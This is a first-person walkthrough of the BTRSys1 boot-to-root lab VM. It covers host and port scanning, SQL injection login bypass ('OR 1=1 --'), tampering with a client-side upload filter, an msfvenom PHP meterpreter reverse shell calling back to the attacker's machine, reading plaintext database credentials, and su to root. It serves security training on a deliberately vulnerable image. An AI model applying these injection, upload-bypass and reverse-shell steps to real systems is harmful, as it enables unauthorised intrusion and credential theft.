BTRisk published a vulnerable machine like Metasploitable, on August 2017. BTRSys1 is intermediate level boot-to-root vulnerable image. Main purpose of boot-to-root images is gain shell access by exploiting vulnerable services work on machine. This information given about the image:
Machine Name: BTRSys1
Difficulty : Beginner / Intermediate
Format : Virtual Machine (VMware)
Description : This is a boot2root machine particularly educational for beginners. Follow us for next BTRSys systems. We hope you enjoy it!
Vulnhub link of this image is :,195/
Importing Files
I downloaded image file (~838 MB) and extract them from compressed RAR file.
unrar x -r BTRsys1.rar
I imported OVF file into VirtualBox and set its configurations.
After importing, I started the virtual machine and a black login page appeared only.
I installed BTRSYS1 image into same NAT network with the Kali Linux in VirtualBox. So, I started my Kali Linux machine and wrote ifconfig to learn what IP network I have connected.
I saw that my Kali Linux’s IP Address is in NAT network and the netmask was Because of that, other machines working on same LAN will be in block.
We can use netdiscover tool to discover connected devices in same private network by using ARP packets.
netdiscover -r
But netdiscover couldn’t resolve machine names. But discovered 4 live devices.
I used nmap to discover other machines and their open ports on same network.
nmap -Pn
I saw the machine has IP address have open ports about FTP, SSH and HTTP. So I decided start a detailed nmap scan on this machine only. I added different parameters to get information about version (-sV) and operation system (-O)
nmap -Pn -sV -O
This nmap output clearly shows that a web application is working this machine on port 80.
Web Application
When I opened this machine’s IP address with a web browser, I saw the index page of web application.
There is no hint in this page. I opened “Hakkımızda” page:
There are randomly texts in this page that introducing how the penetration tests applied in Turkish. It includes many words about security. So, the page can be source of a wordlist if needed.
I can only see 2 pages normally. Because of that, I though there can be hidden pages that have no link from any page. There is a tool named nikto for using discover hidden pages and folders in web applications.
nikto -h
Nikto discovered login.php and config.php pages.
Firstly, I saw a blank page only when I visited config.php page. I have tried also config.php.txt and so on, but cannot find anything about that.
Secondly, I saw a login page when I visited login.php as expected.
There is no hint in appearance, so I must look at the source code of this page.
I can clearly understand that there is a JavaScript code that used for validation process. According to this,
- If I try single quote (‘) into password form, it will say “Hack Trying”
- If the username has not end as “ ” , it will say “You are trying wrong username”
- If both of them okay, my form will send to personel.php page by POST method. I can also access this page by using only “” as username
The personel.php page is shown like below.
I cannot see any information in this page.
If I try direct access to this page without any POST data information, I see this page:
This SQL error told that mysql_fetch_row() function excepts at least 1 parameter but no result returned from the query on 67th line in personel.php file. The hint of this page is that MySQL used in this web application. I remembered the number one vulnerability of OWASP Top 10 list: SQL Injection
SQL Injection 💉
It is not hard to assume the SQL query is like;
SELECT * FROM 'table_name' WHERE user='<username_that_I_entered>'
If I entered username as;
' OR 1=1 --
the query will be formed as fetch all rows from the table. The double hyphen (- -) means in-line comment in SQL syntax. So my query will be like that:
SELECT * FROM tablo_adı WHERE user=” OR 1=1 —
When I send the form, the personel.php page opened like below.
File Upload 📁
In this stage, there is a file upload module in the page. When I browse a PHP file from desktop, the page shows an error that say “You can only upload JPG and PNG files” in Turkish.
I will upload a normal image file to understand where the file will be uploaded in. I browse a normal JPG file from my desktop.
File uploaded but there is no hint about its location. I used dirb tool (nearly same script with nikto) to determine the location of uploaded file. This tool scans directories in the host by using its own wordlist database. I run this command by terminal:
I found /uploads directory in root directory. I visited the directory and it listed like below.
My last uploaded file was here. I returned the last page and inspected its source code. I saw that file extension validation is processing in here.
Burp Suite is a proxy program that can intercept HTTP requests and server responses and let users edit them before forwarding. I used Burp Suite to intercept server response and changed the source code.
- I changed sonuc == “jpg” to sonuc == “php” to make page accept PHP files.
I tried uploading any .php file and it succeed.
I visited the /uploads folder after upload succeed and I found my test file in here.
Reverse Shell
If my php file executed by Apache server, I can execute my commands in remote computer. msfvenom is a payload generator tool that a part of metasploit framework. I used msfvenom to generate a php reverse shell file by using “meterpreter_reverse_tcp” payload.
LHOST = < my kali’s IP Address >
LPORT = < connection port to use >
msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT=4444 -f raw > shell.php
The shell.php file generated and saved in my Kali’s Desktop. I opened the file and removed comment chars from the start of the file. The file was ready to upload remote system.
I uploaded file to system. The file basically sends a request my Kali Linux machine’s 4444th port to get command from remote. This type of attacks named as “Reverse Shell” attack. I must set the connection handler before execute the reverse shell file. I started metasploit console, used multi/handler and set the payload that I used in msfvenom.
msfconsole use exploit/multi/handler set payload php/meterpreter_reverse_tcp
After that I set my local IP address and port.
set lhost set lport 4444
I started my connection handler by the run command.
After that I visited the /uploads folder and run my reverse shell executer file, shell.php.
I clicked on shell.php, my terminal has changed to meterpreter > mode.
I checked some commands to remote machine and understood that I run commands by web server privileges.
MySQL Access
I looked up the www
I want to access some information about system and remembered config.php file. I changed directory to www folder and read the file from terminal.
I clearly saw MySQL database management user was “root” and the password was “toor”. I connected mysql service by using this data.
mysql -u root -p
I run show databases; command to see databases list.
I saw the “user” table when I run show tables;
command in mysql terminal. To list all rows in users table I run the following command:
select * from users
I can see the passwords are keeped here unhashed or unencrypted here, got all columns and rows of this table and the password was clear text and common as: asd123***
I thought that root password can be this password and used following command to escalate privileges to root.
su root
Finally, I got root privileges and I can run commands by them. I have reached the purpose of this vulnerable machine image. I learned and practiced security basics by this experience.